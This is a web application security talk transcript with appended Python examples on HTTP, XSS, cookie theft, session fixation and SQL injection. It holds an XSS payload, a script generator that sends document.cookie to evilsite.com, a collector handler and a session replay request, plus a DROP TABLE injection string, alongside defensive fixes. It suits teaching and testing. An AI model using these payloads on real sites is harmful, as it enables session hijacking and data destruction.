Webapp security testing
Speaker notes

  • TCP (reliable, ordered). Host, port number. Request and response. GET/HEAD/POST. Headers.
  • HTTP/1.1 adds a mandatory 'Host' header. We have run out of IP addresses, so this lets you serve multiple sites from one IP.
  • Set-Cookie / Cookie headers. Attributes: Domain / Path / Secure.
Presentation transcript

  • Fundamentals of web application security & security testing - t0m <bobtfish@bobtfish.net>
  • Who are you?
    • Open source hacker
    • github.com/bobtfish/
    • Perl guy (sorry) - 160 CPAN modules
    • Core team for the Catalyst and Plack web frameworks
    • Ex professional security tester / R&D
  • This talk
    • ~ 1h long
    • Covers the very basics
      • HTTP
      • Host headers
      • Cookies
    • Tools
      • Paros / Charles / etc
    • Sessions
      • Session fixation attacks
    • XSS (general HTML injection)
      • How to test
      • How to exploit
    • SQL injection
    • NOT comprehensive. JUST the basics.
  • You don't need to be a programmer
    • I'm going to assume you know a bit about the internet
    • And that you've at least seen HTML before.
  • Workshop on Sunday
    • No schedule - made by you!
    • Deeper and more practical discussion
  • HTML
    • The markup format that web pages are written in.
    • I'm just assuming you all know the basics. Sorry if you don't ;P
    • Can almost always be sloppy - the browser tries to do the right thing. That forgiveness cuts both ways: injected fragments of broken markup still get parsed and rendered.
  • HTTP - The very basics
    • HTTP goes over TCP/IP
      • Reliable, ordered
      • Host and port
    • Request / Response
      • URL
      • Method
  • Request / Response
    • You ask the server for some data
    • It does some work
    • And serves you a response, possibly including data, called a 'body'
  • Dynamic
    • The response could just be a file on disc (HTML, image, etc)
    • We're interested in when it's dynamic - i.e. when your input changes the HTML output.
  • Request:
      GET / HTTP/1.0

    Response:
      HTTP/1.1 200 OK
      Date: Wed, 29 Aug 2012 21:47:59 GMT
      Server: Apache
      Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
      ETag: "1c888b-0-4a90a5e239540"
      Accept-Ranges: bytes
      Content-Length: 0
      Vary: Accept-Encoding
      Connection: close
      Content-Type: text/html
      X-Pad: avoid browser bug
  • GET / HTTP/1.0
    • Simplest possible HTTP request
    • Method - GET
    • URL - /
    • HTTP version
    • Followed by a blank line: \r\n\r\n (CRLF CRLF)
  • GET / HTTP/1.0
    • Headers are optional after the first line (one Key: Value per line)
    • A body can be supplied after the \r\n\r\n if you specify a non-zero Content-Length
    • There will be examples of this later
  • HTTP/1.1 200 OK
    • Always the first line of the response
    • We asked for 1.0, got 1.1 back
    • 200 is the response code:
      • 2xx - Success
      • 3xx - Redirect
      • 4xx - Client error
      • 5xx - Server error
  • Date: Wed, 29 Aug 2012 21:47:59 GMT
    • Other headers now follow. All in the format Key: Value
    • Date: RFC 822 / RFC 1123 date format
    • Optional
  • Server: Apache
    • Sometimes has exact versions and extensions
    • Easy to lie - treat it as a hint, never as proof of what is really running
    • Optional
  • Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
    • Used for caching (maybe)
    • Optional
  • ETag: "1c888b-0-4a90a5e239540"
    • Used for caching (maybe)
    • Apache's default ETag is built from the file's inode, size and mtime, so it leaks a little about the server's filesystem
    • Optional
  • Accept-Ranges: bytes
    • 'Partial GET' - ask for a byte range of the file, get back just that part
    • Used by download managers to resume
    • Optional
  • Content-Length: 0
    • Specifies how long the body is, in bytes
    • Can be 0
    • Effectively mandatory for a response with a body. The alternatives are Transfer-Encoding: chunked, or reading until the server closes the connection. When two hops disagree about where a body ends you get request smuggling, so testers look hard at exactly this header.
  • Vary: Accept-Encoding
    • For caching
    • Which request header fields mean a different version of the document, e.g. language detection
    • Optional
  • Connection: close
    • The server is going to drop the connection; you have to reconnect.
    • Possible to keep the connection persistent if you ask for it (and that is the HTTP/1.1 default)
  • Content-Type: text/html
    • How the browser should interpret the body
    • Should be sent for any response with a body; if it is missing or wrong, browsers guess from the content ('sniffing'), which is how an uploaded 'text' file can end up rendered as HTML
  • HTTP 1.1
    • Adds a mandatory Host header to the request
    • Allows > 1 web site per IP address
  • Request:
      GET / HTTP/1.1
      Host: goatse.co.uk

    Response:
      HTTP/1.1 200 OK
      Date: Wed, 29 Aug 2012 21:49:49 GMT
      Server: Apache
      Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
      ETag: "1c888b-0-4a90a5e239540"
      Accept-Ranges: bytes
      Content-Length: 0
      Vary: Accept-Encoding
      Connection: close
      Content-Type: text/html
      X-Pad: avoid browser bug
  • Sending data to the server
    • Encode it into the URI
      • /with/a/path
      • /?or=parameters
  • POST
    • Used to send data back to the server
    • Content-Type: application/x-www-form-urlencoded
    • Has a Content-Length, and a body
    • Data is encoded like this: foo=bar&foo2=baz
  • POST
      POST / HTTP/1.1
      Host: www.example.com
      Content-Length: 17
      Content-Type: application/x-www-form-urlencoded

      foo=bar&foo2=quux
  • Forms
    • HTML forms are the primary means of getting user data to the server
    • Data is in the body, not the URL, so it doesn't get saved in bookmarks (or, usually, in access logs)
    • <form> tag
    • <input> tag
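To make the framing concrete, here is an added example (my code, not from the talk) that builds the GET and form-POST requests shown above byte for byte and parses a raw response by its Content-Length. The host name, form fields and sample response bytes are constructed for the demo; the response is shaped like the Apache reply on the earlier slide but carries a short body.

```python
"""Hand-built HTTP/1.x requests and a minimal response parser.

Added example, not code from the talk. Host, path and field values are made up.
"""
from typing import Dict, Tuple
from urllib.parse import urlencode

CRLF = "\r\n"


def build_get(path: str, host: str, version: str = "HTTP/1.1") -> bytes:
    """Request line, optional headers, then the blank line (CRLF CRLF).

    HTTP/1.1 makes Host mandatory (several sites per IP); HTTP/1.0 has no
    such header, so the 1.0 form really is just the request line.
    """
    lines = [f"GET {path} {version}"]
    if version == "HTTP/1.1":
        lines.append(f"Host: {host}")
    return (CRLF.join(lines) + CRLF + CRLF).encode("ascii")


def build_post(path: str, host: str, fields: Dict[str, str]) -> bytes:
    """Form POST: urlencoded body, and Content-Length must match it exactly."""
    body = urlencode(fields).encode("ascii")
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
    ]
    return (CRLF.join(headers) + CRLF + CRLF).encode("ascii") + body


def parse_response(raw: bytes) -> Tuple[str, int, Dict[str, str], bytes]:
    """Split a raw response into (version, status, headers, body).

    Body length is taken from Content-Length. A chunked body is refused
    rather than mis-parsed: mis-framing bodies is how smuggling bugs start.
    """
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers (CRLF CRLF) found")
    lines = head.decode("iso-8859-1").split(CRLF)
    parts = lines[0].split(" ", 2)          # "HTTP/1.1 200 OK" -> version, code, reason
    version, status = parts[0], int(parts[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()   # header names are case-insensitive
    if headers.get("transfer-encoding", "").lower() == "chunked":
        raise ValueError("chunked body: not handled here")
    length = int(headers.get("content-length", "0"))
    if len(rest) < length:
        raise ValueError("body shorter than Content-Length")
    return version, status, headers, rest[:length]


# Constructed response: the shape of the Apache reply on the slide, with a 5-byte body.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Wed, 29 Aug 2012 21:47:59 GMT\r\n"
    b"Server: Apache\r\n"
    b"Content-Length: 5\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"hello"
)

if __name__ == "__main__":
    print(build_get("/", "www.example.com", "HTTP/1.0").decode())
    print(build_get("/", "www.example.com").decode())
    print(build_post("/", "www.example.com", {"foo": "bar", "foo2": "quux"}).decode())
    print(parse_response(SAMPLE_RESPONSE))
```

The parser deliberately refuses Transfer-Encoding: chunked instead of guessing. When a front-end proxy and a back-end server resolve a Content-Length/chunked conflict differently, one of them reads the next request out of the other's body, which is the whole basis of HTTP request smuggling.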
  • Ok - basics covered!
    • Phew!
    • Let's put all this stuff together - into an application.
    • And then hack it.
  • Simplest possible app
      <html>Data is:
      <form>
      <input name="foo" value="<?php echo $_GET[foo] ?>" />
      <input type="submit" />
      </form>
      </html>
  • http://server/test.php?foo=foo
  • FAIL
    • Did you spot the epic fail?
    • value="<?php echo $_GET[foo] ?>"
    • Golden rule - never ever accept input without validating it's sane
    • Golden rule - never ever output anything that may have come from external input without encoding it
  • WHY?
    • You can send: ?foo="><blink>Foo<%2Fblink>
    • Comes out as: <input name="foo" value=""><blink>Foo</blink>
    • You just added HTML to the document - fail!
  • Javascript
    • Is where it all goes really wrong
    • Can change or rewrite the page
    • Can be inserted inline into HTML
    • foo="><script>document.removeChild(document.getElementsByTagName('html')[0])</script> (URL-encode the / as %2F when you send it)
  • Bye bye page!
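The slide's test.php, re-implemented as an added example (my code, not the talk's) so the vulnerable and the encoded output can be compared, together with the probe a tester sends to find this class of bug without guessing payloads. The template mirrors the slide's form; the canary string is my own choice.

```python
"""Reflected HTML injection: the slide's form, vulnerable and fixed, plus a
tester's canary probe. Added example, not code from the talk.
"""
import html
import re
from typing import Callable, List
from urllib.parse import parse_qs, quote

# Same document as the slide's test.php, with {value} where $_GET[foo] is echoed.
TEMPLATE = (
    '<html>Data is: <form><input name="foo" value="{value}" />'
    '<input type="submit" /></form></html>'
)


def get_foo(query_string: str) -> str:
    """Equivalent of $_GET['foo']: URL-decodes, returns '' if absent."""
    return parse_qs(query_string, keep_blank_values=True).get("foo", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """What the slide does: raw input straight into an attribute value."""
    return TEMPLATE.format(value=get_foo(query_string))


def render_fixed(query_string: str) -> str:
    """Golden rule #2: encode on output. quote=True also escapes " and ',
    so the attribute cannot be closed early."""
    return TEMPLATE.format(value=html.escape(get_foo(query_string), quote=True))


_TAG = re.compile(r"<\s*([a-zA-Z][a-zA-Z0-9]*)")


def tag_names(document: str) -> List[str]:
    """Crude tag inventory: a tag name that was not in the template means HTML got in."""
    return [m.group(1).lower() for m in _TAG.finditer(document)]


# Tester's canary: a quote and an angle bracket each, wrapped in something unique to grep for.
CANARY = 'zz1"><zz2>'


def reflects_unencoded(render: Callable[[str], str]) -> bool:
    """Send the canary URL-encoded; if it comes back byte for byte, output is not encoded."""
    return CANARY in render("foo=" + quote(CANARY, safe=""))


if __name__ == "__main__":
    # The exact query string from the slide; %2F decodes to '/'.
    slide_query = 'foo="><blink>Foo<%2Fblink>'
    print(render_vulnerable(slide_query))
    print(render_fixed(slide_query))
```

The canary approach is how a tester checks every reflected parameter in one pass: reflect a string containing a quote and an angle bracket and grep the response for it unchanged. Which characters survive tells you which context (attribute, text node, script block) you are in, and therefore what the real payload needs to look like.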
  • Less simple example
    • Add data storage
    • E.g. a message board multiple people can look at
    • Doom! Or at least vandalism - the injected HTML is now stored and served to every visitor (stored XSS)
  • More theory
    • Sorry, but it's necessary
    • People's credit card numbers are behind login pages
    • So we have to understand how logins work to steal them
  • Cookies (not the kind you eat!)
  • Set-Cookie
    • A response header: the server sends it, the browser stores the cookie
    • Set-Cookie: foo=bar
    • Set-Cookie: foo=bar; expires=Thu, 01-Jan-1970 00:01:40 GMT; path=/; domain=example.net
    • Domain and Path scope where the browser sends it back; Secure means HTTPS only; HttpOnly keeps it out of reach of JavaScript. An expires date in the past (like the 1970 one above) tells the browser to delete the cookie.
    • Affects subsequent requests: the browser returns a "Cookie: foo=bar" request header
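An added example (my code, not the talk's) that parses Set-Cookie headers and reports the attributes that decide whether a session cookie can be stolen: no HttpOnly means JavaScript can read it, no Secure means it also travels over plain HTTP, a Domain attribute hands it to every subdomain, and a past Expires means the header is deleting the cookie. The sample headers are constructed; the issue codes are my own naming.

```python
"""Audit Set-Cookie headers for the attributes a tester checks first.
Added example, not from the talk; the sample headers are constructed.
"""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from http.cookies import SimpleCookie
from typing import Dict, List, Optional


def _expired(expires: str, now: datetime) -> bool:
    """True if the Expires attribute is in the past (the browser deletes the cookie)."""
    try:
        when = parsedate_to_datetime(expires)
    except (TypeError, ValueError):
        return False
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    return when < now


def audit_set_cookie(header_values: List[str], site_is_https: bool = True,
                     now: Optional[datetime] = None) -> Dict[str, List[str]]:
    """Return {cookie name: [issue codes]} for each Set-Cookie header value.

    no-httponly  readable via document.cookie, so an XSS can exfiltrate it
    no-secure    also sent on plain-HTTP requests, so a network sniffer gets it
    wide-domain  Domain= set, so every subdomain receives (and can overwrite) it
    deleted      Expires in the past: this header removes the cookie
    """
    now = now or datetime.now(timezone.utc)
    findings: Dict[str, List[str]] = {}
    for raw in header_values:
        jar = SimpleCookie()
        jar.load(raw)                      # parses name=value plus the standard attributes
        for name, morsel in jar.items():
            issues: List[str] = []
            if morsel["expires"] and _expired(morsel["expires"], now):
                issues.append("deleted")
            else:
                if not morsel["httponly"]:
                    issues.append("no-httponly")
                if site_is_https and not morsel["secure"]:
                    issues.append("no-secure")
                if morsel["domain"]:
                    issues.append("wide-domain")
            findings[name] = issues
    return findings


# Constructed headers: a weak session cookie, a well-flagged one, and the slide's 1970 deletion.
SAMPLE_HEADERS = [
    "session=7d3a9c1f; path=/; domain=example.net",
    "session2=9fa1b2c3; Path=/; Secure; HttpOnly",
    "foo=bar; expires=Thu, 01-Jan-1970 00:01:40 GMT; path=/; domain=example.net",
]

if __name__ == "__main__":
    for name, issues in audit_set_cookie(SAMPLE_HEADERS).items():
        print(name, issues or "ok")
```

Run it against a proxy's capture of a login response: a session cookie reported as no-httponly is the one the cookie-stealing script later in this talk can read, and no-secure is the one a sniffer on the same network gets whenever the site mixes HTTP and HTTPS.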
  • Sessions
    • Hand each visitor a random session token, identify them in future
    • Login credentials only transmitted once
    • Allows login to be SSL (and rest of site not) - but then the session cookie travels in the clear on every non-SSL request, and to anyone sniffing the network it is as good as the password
  • Sessions
    • Shared secret
    • If it stops being a secret, you lose!
  • Stealing cookies
    • Can get cookie data from javascript (document.cookie) - unless the cookie was set with HttpOnly
    • If we find an HTML injection vulnerability, we can run code that grabs the cookie
    • "Same origin policy" - our script can't read responses from other sites, and (without CORS) XMLHttpRequest to another origin is blocked. It does not stop the browser fetching a resource from wherever we like.
    • Cheat! Add content to the document.
  • <img src="http://evilsite.com/?data=here" />
  • Let's step through that
    • Message board site gives users a cookie when they login
    • Cookie contains session token
    • You post an evil message containing Javascript
    • Other users view your message
    • Other users' browsers execute your javascript
    • It grabs their cookie
    • Adds to their page: <img src="http://evilsite.com/?data=cookie_data" />
    • The user's browser tries to download the image
    • evilsite.com records the cookie
    • evilsite.com serves a 1px x 1px transparent gif
    • I can now post messages as any (still logged in) user who viewed my message.
    • Having the user's cookie allows you to become the user
  • Did you notice the handwave?
    • I need a way to get your cookie into my browser
    • This is easy to do - find a proxy library in your favourite programming language ;P
    • Or tools you can just download - any intercepting proxy lets you edit the Cookie header on the way out
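The three pieces of the step-through above, as an added example (my code, not the talk's): the script the attacker posts, the collector's side on evilsite.com, and the request that replays the stolen cookie. evilsite.com, the board's host name, the path and the cookie values are placeholders, and nothing here touches a network; the victim's image request is constructed to show what the browser would send.

```python
"""The cookie-theft chain from the slides. Added example, not code from the
talk; host names, paths and cookie values are placeholders.
"""
import base64
from typing import Tuple
from urllib.parse import parse_qs, quote, urlsplit

# The canonical tiny transparent GIF, which is what the collector answers with.
PIXEL_GIF = base64.b64decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7")


def exfil_script(collector: str) -> str:
    """JavaScript the attacker posts to the message board.

    It reads document.cookie (only cookies without HttpOnly) and adds an image
    whose URL carries it. The browser fetching that image is the cross-origin
    'transmit' that the same-origin policy does not stop.
    """
    return (
        "<script>"
        "var i=new Image();"
        f"i.src='{collector}?data='+encodeURIComponent(document.cookie);"
        "document.body.appendChild(i);"
        "</script>"
    )


def collector_handle(raw_request: bytes) -> Tuple[str, bytes]:
    """evilsite.com's side: pull the cookie out of the request line and reply
    with the pixel so nothing looks broken in the victim's page."""
    request_line = raw_request.split(b"\r\n", 1)[0].decode("iso-8859-1")
    _method, target, _version = request_line.split(" ", 2)
    stolen = parse_qs(urlsplit(target).query).get("data", [""])[0]
    response = (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: image/gif\r\n"
        + f"Content-Length: {len(PIXEL_GIF)}\r\n".encode("ascii")
        + b"Connection: close\r\n\r\n"
        + PIXEL_GIF
    )
    return stolen, response


def replay_as_victim(host: str, path: str, stolen_cookie: str, message: str) -> bytes:
    """Attacker's request: the victim's Cookie header pasted into a form POST,
    which is all an intercepting proxy does for you. Having the cookie is being the user."""
    body = "message=" + quote(message, safe="")
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {stolen_cookie}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
        f"{body}"
    ).encode("ascii")


# Constructed: what the victim's browser sends to evilsite.com once the script has run.
VICTIM_IMG_REQUEST = (
    b"GET /?data=session%3Dabc123%3B%20theme%3Ddark HTTP/1.1\r\n"
    b"Host: evilsite.com\r\n\r\n"
)

if __name__ == "__main__":
    print(exfil_script("http://evilsite.com/"))
    stolen, _ = collector_handle(VICTIM_IMG_REQUEST)
    print("collector logged:", stolen)
    print(replay_as_victim("board.example.com", "/post", stolen, "pwned").decode())
```

If the session cookie had been set with HttpOnly, document.cookie would not contain it and the collector would log nothing useful; if the board also rejected a session ID it had not issued, the fixation variant on the next slides would fail too.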
  • Session fixation
    • Quite a common bug
    • Allows you to specify the session ID you'd like
    • Useful for abusing XSS elsewhere
    • Also good to steal logins without needing XSS: hand the victim a link carrying your chosen ID, wait for them to log in, then use the same ID yourself
    • /?sessionID=XXXXXXXXXXX
    • The fix: never accept a session ID the server didn't issue, and issue a fresh one at login (and at any other change of privilege)
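Session fixation in miniature, as an added example (my code, not the talk's): a login that accepts whatever session ID the request carried, beside one that discards the pre-login session and issues a new ID. The user record, password and the attacker's chosen ID are constructed for the demo.

```python
"""Session fixation, vulnerable and fixed. Added example, not code from the
talk; the user database and session IDs are constructed for the demo.
"""
import hmac
import secrets
from typing import Callable, Dict, Optional

# Demo user store: a plaintext password only because this is a demo.
USERS: Dict[str, str] = {"victim": "hunter2"}


class SessionStore:
    def __init__(self) -> None:
        self.sessions: Dict[str, dict] = {}   # session id -> session data

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)      # unguessable and chosen by the server
        self.sessions[sid] = {}
        return sid


def check_password(username: str, password: str) -> bool:
    stored = USERS.get(username, "")
    return username in USERS and hmac.compare_digest(stored.encode(), password.encode())


def login_vulnerable(store: SessionStore, presented_sid: Optional[str],
                     username: str, password: str) -> Optional[str]:
    """Attaches the login to a session ID the client supplied (e.g. from
    /?sessionID=XXXX). Whoever chose that ID is now logged in as the user."""
    if not check_password(username, password):
        return None
    sid = presented_sid or store.new_session()
    store.sessions.setdefault(sid, {})["user"] = username
    return sid


def login_fixed(store: SessionStore, presented_sid: Optional[str],
                username: str, password: str) -> Optional[str]:
    """Only trusts IDs it issued itself, and rotates the ID at login."""
    if not check_password(username, password):
        return None
    if presented_sid in store.sessions:
        del store.sessions[presented_sid]     # drop the pre-login session entirely
    sid = store.new_session()                 # fresh ID: anything the attacker planted is worthless
    store.sessions[sid]["user"] = username
    return sid


def whoami(store: SessionStore, sid: str) -> Optional[str]:
    return store.sessions.get(sid, {}).get("user")


def fixation_attack(login: Callable[..., Optional[str]]) -> Optional[str]:
    """Attacker plants an ID via a link, the victim logs in with it, the
    attacker then presents the same ID. Returns who the attacker is logged in as."""
    store = SessionStore()
    attacker_sid = "XXXXXXXXXXX"             # the slide's /?sessionID=XXXXXXXXXXX
    login(store, attacker_sid, "victim", "hunter2")   # victim follows the link and logs in
    return whoami(store, attacker_sid)       # attacker's view using that same ID


if __name__ == "__main__":
    print("vulnerable login, attacker sees:", fixation_attack(login_vulnerable))
    print("fixed login, attacker sees:", fixation_attack(login_fixed))
```

In a real application the fixed version goes one step further: the ID is read only from the cookie the server set, never from a query parameter, and the same rotation happens whenever the session gains privilege.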
  • Tools
  • Tools - Paros
    • http://www.parosproxy.org/
  • Tools - Charles
    • Java application; runs on OS X, Windows and Linux
    • Costs money (free trial)
  • Tools - Firebug
    • Firefox addon
    • Allows you to debug javascript and HTML
    • Useful for getting exploits working in combination with another tool
  • SQL Injection
    • SQL used by databases, for data storage
    • Tables, with columns and rows
    • SELECT id, name FROM users WHERE name = 'fred' AND password = 'example';
    • SAME ISSUE AS BEFORE - user input pasted straight into the query string
  • SQL Injection
    • Send the name: Robert'; DROP TABLE Students;--
    • The quote closes the string the application opened, so the query becomes:
      SELECT id, name FROM users WHERE name = 'Robert'; DROP TABLE Students;--' AND password = 'example';
    • First query - No password needed! The AND password = ... clause is inside the comment.
    • Second query - Ruins your day! (Only if the database driver will run more than one statement per call; many, e.g. PHP's mysql_query, refuse. Bypassing the password check needs just the one statement.)
    • Comment (--) - the rest of the original query is ignored!
  • Golden Rules
    • Never ever accept input without validating it's sane.
    • Never ever output anything that may have come from external input without encoding it.
  • Thanks for listening!
    • Hope that wasn't too boring :)
    • Feel free to come chat to me.
    • Or mail me: bobtfish@bobtfish.net
    • Or grab me on irc: t0m on Freenode
    • More in-depth workshop on Sunday!